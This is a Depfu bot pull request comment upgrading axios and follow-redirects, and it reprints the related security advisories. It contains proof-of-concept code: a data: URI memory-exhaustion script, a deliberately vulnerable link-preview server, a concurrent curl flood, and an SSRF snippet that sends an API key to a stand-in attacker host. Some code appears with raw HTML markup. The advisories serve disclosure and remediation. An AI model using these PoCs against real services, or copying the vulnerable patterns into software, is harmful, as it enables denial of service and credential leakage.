@depfu depfu bot commented Sep 11, 2025


🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend merging and deploying this as soon as possible!


Here is everything you need to know about this upgrade. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ axios (0.24.0 β†’ 1.12.0) Β· Repo Β· Changelog

Security Advisories 🚨

🚨 Axios is vulnerable to DoS attack through lack of data size check

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform an HTTP request. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects once totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios with streaming, keep-alive agents, timeouts, and a JSON body limit. It allows data: URLs, for which axios ignores maxContentLength and maxBodyLength entirely and decodes the full payload into memory on Node before any streaming occurs, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });

let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);

const before = process.memoryUsage().heapUsed;

try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 1024, // Axios will ignore this for data:
maxBodyLength: 8
1024, // Axios will ignore this for data:
signal: controller.signal
});

<span class="pl-c">// stream only the first 64KB back</span>
<span class="pl-k">const</span> <span class="pl-s1">cap</span> <span class="pl-c1">=</span> <span class="pl-c1">64</span> <span class="pl-c1">*</span> <span class="pl-c1">1024</span><span class="pl-kos">;</span>
<span class="pl-k">let</span> <span class="pl-s1">sent</span> <span class="pl-c1">=</span> <span class="pl-c1">0</span><span class="pl-kos">;</span>
<span class="pl-k">const</span> <span class="pl-s1">limiter</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-v">PassThrough</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">on</span><span class="pl-kos">(</span><span class="pl-s">"data"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-s1">chunk</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
  <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">sent</span> <span class="pl-c1">+</span> <span class="pl-s1">chunk</span><span class="pl-kos">.</span><span class="pl-c1">length</span> <span class="pl-c1">&gt;</span> <span class="pl-s1">cap</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">end</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">destroy</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span>
  <span class="pl-k">else</span> <span class="pl-kos">{</span> <span class="pl-s1">sent</span> <span class="pl-c1">+=</span> <span class="pl-s1">chunk</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">write</span><span class="pl-kos">(</span><span class="pl-s1">chunk</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">on</span><span class="pl-kos">(</span><span class="pl-s">"end"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">end</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">on</span><span class="pl-kos">(</span><span class="pl-s">"error"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-s1">e</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">destroy</span><span class="pl-kos">(</span><span class="pl-s1">e</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span>

<span class="pl-k">const</span> <span class="pl-s1">after</span> <span class="pl-c1">=</span> <span class="pl-s1">process</span><span class="pl-kos">.</span><span class="pl-en">memoryUsage</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-c1">heapUsed</span><span class="pl-kos">;</span>
<span class="pl-s1">res</span><span class="pl-kos">.</span><span class="pl-en">set</span><span class="pl-kos">(</span><span class="pl-s">"x-heap-increase-mb"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-kos">(</span><span class="pl-s1">after</span> <span class="pl-c1">-</span> <span class="pl-s1">before</span><span class="pl-kos">)</span><span class="pl-c1">/</span><span class="pl-c1">1024</span><span class="pl-c1">/</span><span class="pl-c1">1024</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">toFixed</span><span class="pl-kos">(</span><span class="pl-c1">2</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">pipe</span><span class="pl-kos">(</span><span class="pl-s1">res</span><span class="pl-kos">)</span><span class="pl-kos">;</span>

} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});

app.listen(PORT, () => {
console.log(axios-poc-link-preview listening on http://0.0.0.0:<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-c1">PORT</span><span class="pl-kos">}</span></span>);
console.log(Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-c1">BODY_LIMIT</span><span class="pl-kos">}</span></span>).);
});

Run the app and send three POST requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
  | tee payload.json >/dev/null
# URL is the preview endpoint of the app above, e.g. URL=http://localhost:8081/preview
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit. A caller-side sketch of this check follows the list.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
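
Until axios enforces such a limit itself, a caller can approximate suggestion 1 at the application layer. The following is a minimal sketch only: assertDataUriWithinLimit, safeGet and the 8 KB cap are illustrative assumptions, not part of the axios API.

const axios = require('axios');

// Hypothetical caller-side guard: reject oversized data: URIs before axios decodes them.
const MAX_DATA_URI_BYTES = 8 * 1024; // illustrative cap

function assertDataUriWithinLimit(url, maxBytes = MAX_DATA_URI_BYTES) {
  if (!url.startsWith('data:')) return; // only data: URIs bypass axios' size checks
  const comma = url.indexOf(',');
  const payload = comma === -1 ? '' : url.slice(comma + 1);
  const isBase64 = /;base64$/i.test(url.slice(5, comma === -1 ? url.length : comma));
  // Base64 decodes to roughly 3/4 of its encoded length.
  const approxBytes = isBase64 ? Math.ceil(payload.length * 3 / 4) : payload.length;
  if (approxBytes > maxBytes) {
    throw new Error(`data: URI too large (~${approxBytes} bytes > ${maxBytes})`);
  }
}

async function safeGet(url, config) {
  assertDataUriWithinLimit(url); // pre-check before axios touches the URI
  return axios.get(url, config); // normal HTTP requests keep their usual size limits
}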

🚨 axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: #6463

A similar problem has been identified when passing absolute URLs (rather than protocol-relative URLs) to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue affects both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL. A caller-side sketch of this check follows.
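
Until such a check exists in axios itself, callers can enforce it before each request. A minimal sketch, assuming only the public axios API; assertUnderBaseURL and getUser are illustrative names:

import axios from "axios";

// Hypothetical guard: resolve the caller-supplied value against baseURL and refuse
// to send the request if the result escapes the expected origin and path prefix.
function assertUnderBaseURL(baseURL, requestPath) {
  const base = new URL(baseURL);
  const resolved = new URL(requestPath, base); // an absolute input overrides the base here
  if (resolved.origin !== base.origin || !resolved.pathname.startsWith(base.pathname)) {
    throw new Error(`Refusing request outside baseURL: ${resolved.href}`);
  }
  return resolved.href;
}

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: { "X-API-KEY": "1234567890" },
});

async function getUser(userId) {
  // Throws for inputs like "http://attacker.test/" instead of leaking X-API-KEY.
  const safeURL = assertUnderBaseURL(internalAPIClient.defaults.baseURL, String(userId));
  return internalAPIClient.get(safeURL);
}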

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  2. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  3. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

🚨 Server-Side Request Forgery in axios

axios 1.7.2 allows SSRF via unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs.

🚨 Axios Cross-Site Request Forgery Vulnerability

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host, allowing attackers to view sensitive information.

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ follow-redirects (indirect, 1.14.5 β†’ 1.15.11) Β· Repo

Security Advisories 🚨

🚨 follow-redirects' Proxy-Authorization header kept across hosts

When using axios, its dependency follow-redirects only clears the Authorization header during a cross-domain redirect, but keeps the Proxy-Authorization header, which also contains credentials.

Steps To Reproduce & PoC

Test code:

const axios = require('axios');

axios.get('http://127.0.0.1:10081/', {
  headers: {
    'AuThorization': 'Rear Test',
    'ProXy-AuthoriZation': 'Rear Test',
    'coOkie': 't=1'
  }
})
.then((response) => {
  console.log(response);
});

When the request meets a cross-domain redirect, sensitive headers such as Authorization and Cookie are cleared, but the Proxy-Authorization header is kept.

Impact

This vulnerability may lead to a credential leak.

Recommendations

Remove the Proxy-Authorization header during cross-domain redirects.

Recommended Patch

follow-redirects/index.js:464

- removeMatchingHeaders(/^(?:authorization|cookie)$/i, this._options.headers);
+ removeMatchingHeaders(/^(?:authorization|proxy-authorization|cookie)$/i, this._options.headers);
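
Until a patched follow-redirects is in place, a caller-side workaround is to stop following redirects automatically, so credential headers are never re-sent to another host. A minimal sketch; fetchWithManualRedirect is an illustrative helper, not an axios or follow-redirects API:

const axios = require('axios');

// Disable automatic redirect following; 3xx responses are returned to the caller.
const client = axios.create({
  maxRedirects: 0,
  validateStatus: s => s >= 200 && s < 400 // treat 3xx as a response, not an error
});

async function fetchWithManualRedirect(url, config = {}) {
  const res = await client.get(url, config);
  if (res.status >= 300 && res.status < 400 && res.headers.location) {
    // Follow the redirect explicitly, deliberately dropping Authorization,
    // Proxy-Authorization and Cookie instead of forwarding them cross-host.
    return client.get(new URL(res.headers.location, url).toString());
  }
  return res;
}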

🚨 Follow Redirects improperly handles URLs in the url.parse() function

Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.

🚨 Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects

Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.

🚨 Exposure of sensitive information in follow-redirects

follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

πŸ†• asynckit (added, 0.4.0)

πŸ†• call-bind-apply-helpers (added, 1.0.2)

πŸ†• combined-stream (added, 1.0.8)

πŸ†• delayed-stream (added, 1.0.0)

πŸ†• dunder-proto (added, 1.0.1)

πŸ†• es-define-property (added, 1.0.1)

πŸ†• es-errors (added, 1.3.0)

πŸ†• es-object-atoms (added, 1.1.1)

πŸ†• es-set-tostringtag (added, 2.1.0)

πŸ†• form-data (added, 4.0.4)

πŸ†• get-proto (added, 1.0.1)

πŸ†• gopd (added, 1.2.0)

πŸ†• has-tostringtag (added, 1.0.2)

πŸ†• hasown (added, 2.0.2)

πŸ†• math-intrinsics (added, 1.1.0)

πŸ†• proxy-from-env (added, 1.1.0)


πŸ‘‰ No CI detected

You don't seem to have any Continuous Integration service set up!

Without a service that will test the Depfu branches and pull requests, we can't inform you if incoming updates actually work with your app. We think that this degrades the service we're trying to provide down to a point where it is more or less meaningless.

This is fine if you just want to give Depfu a quick try. If you want to really let Depfu help you keep your app up-to-date, we recommend setting up a CI system:

* [Circle CI](https://circleci.com), [Semaphore](https://semaphoreci.com) and [Github Actions](https://docs.github.com/actions) are all excellent options.
* If you use something like Jenkins, make sure that you're using the Github integration correctly so that it reports status data back to Github.
* If you have already set up a CI for this repository, you might need to check your configuration. Make sure it will run on all new branches. If you don't want it to run on every branch, you can whitelist branches starting with `depfu/`.

Depfu Status

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands
@​depfu rebase
Rebases against your default branch and redoes this update
@​depfu recreate
Recreates this PR, overwriting any edits that you've made to it
@​depfu merge
Merges this PR once your tests are passing and conflicts are resolved
@​depfu cancel merge
Cancels automatic merging of this PR
@​depfu close
Closes this PR and deletes the branch
@​depfu reopen
Restores the branch and reopens this PR (if it's closed)
@​depfu pause
Ignores all future updates for this dependency and closes this PR
@​depfu pause [minor|major]
Ignores all future minor/major updates for this dependency and closes this PR
@​depfu resume
Future versions of this dependency will create PRs again (leaves this PR as is)
